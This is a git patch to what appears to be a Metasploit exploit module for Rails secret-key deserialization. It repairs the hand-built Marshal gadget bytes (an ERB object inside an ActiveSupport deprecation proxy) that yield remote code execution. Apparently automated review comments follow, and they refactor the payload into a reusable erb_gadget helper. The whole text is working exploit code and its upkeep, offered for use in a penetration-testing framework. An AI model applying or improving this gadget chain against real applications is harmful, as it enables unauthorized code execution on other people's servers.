From 17bad7bd4fa713d44ff25189107fce8066b6b810 Mon Sep 17 00:00:00 2001
From: Justin Steven
Date: Tue, 13 Sep 2016 21:25:14 +1000
Subject: [PATCH] fix popchain

ERB changed as per which broke the popchain used for code execution.
---
 modules/exploits/multi/http/rails_secret_deserialization.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 2a8e05ead6..1efb8df4fb 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -200,8 +200,9 @@ class MetasploitModule < Msf::Exploit::Remote
 return "\x04\b" +
 "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
 ":\x0E@instanceo" +
- ":\bERB\x06" +
+ ":\bERB\x07" +
 ":\t@src"+ Marshal.dump(code)[2..-1] +
+ ":\x0c@lineno"+ "i\x00" +
 ":\f@method:\vresult:" +
 "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
 end
@@ -209,9 +210,10 @@ class MetasploitModule < Msf::Exploit::Remote
 return Rex::Text.encode_base64 "\x04\x08" +
 "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
 ":\x0E@instance" +
- "o"+":\x08ERB"+"\x06" +
+ "o"+":\x08ERB"+"\x07" +
 ":\x09@src" + Marshal.dump(code)[2..-1] +
+ ":\x0c@lineno"+ "i\x00" +
 ":\x0C@method"+":\x0Bresult"
 end
 end
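Review bot: The bumped ivar count `":\bERB\x07"` and the new `":\x0c@lineno"+ "i\x00" +` line are hand-assembled Marshal bytes with no comment explaining what they encode, which is exactly how the previous layout silently rotted when ERB changed. A one-line comment on the added `@lineno` line would record the contract for the next maintainer: `# ERB#result now passes @lineno to eval, so the ERB object needs two ivars (\x07): @src and @lineno = Fixnum 0 (i\x00)`. The reason ERB needs @lineno is inferred from the commit message rather than visible here, so confirm the wording against the Ruby/ERB change before committing it. The enclosing method's signature is outside the hunk.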
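Review bot: The added `":\x0c@lineno"+ "i\x00" +` line uses a lowercase hex escape and an unspaced `+`, while every other byte in this method is written uppercase (`\x0E`, `\x09`, `\x0C`, `\x0B`) with spaced operators; `":\x0C@lineno" + "i\x00" +` would match the surrounding style. Beyond style, the ERB sub-object (`o`, `:\x08ERB`, ivar count, `@src`, `@lineno`) is now spelled out byte-for-byte both here and in the Rails 4 method in the previous hunk, so the next ERB layout change has to be patched in two places again; a small helper returning those bytes, called as `":\x0E@instance" + erb_gadget(code) +` here (and replacing the trailing `o` of `":\x0E@instanceo"` in the other method), would keep the gadget in one spot. Whether the Rails 3 target's ERB actually reads `@lineno` cannot be told from this hunk; an extra ivar is harmless to Marshal but worth confirming against the targets this method serves. The enclosing method's signature is outside the hunk.
```ruby
  # Marshal bytes for an ERB instance with two ivars: @src (the code that
  # ERB#result evals) and @lineno (Fixnum 0, which newer ERB passes to eval).
  # Shared by the Rails 3 and Rails 4 payload builders so the gadget layout
  # is adjusted in one place when ERB changes again.
  def erb_gadget(code)
    "o" + ":\x08ERB" + "\x07" +
      ":\x09@src" + Marshal.dump(code)[2..-1] +
      ":\x0C@lineno" + "i\x00"
  end
```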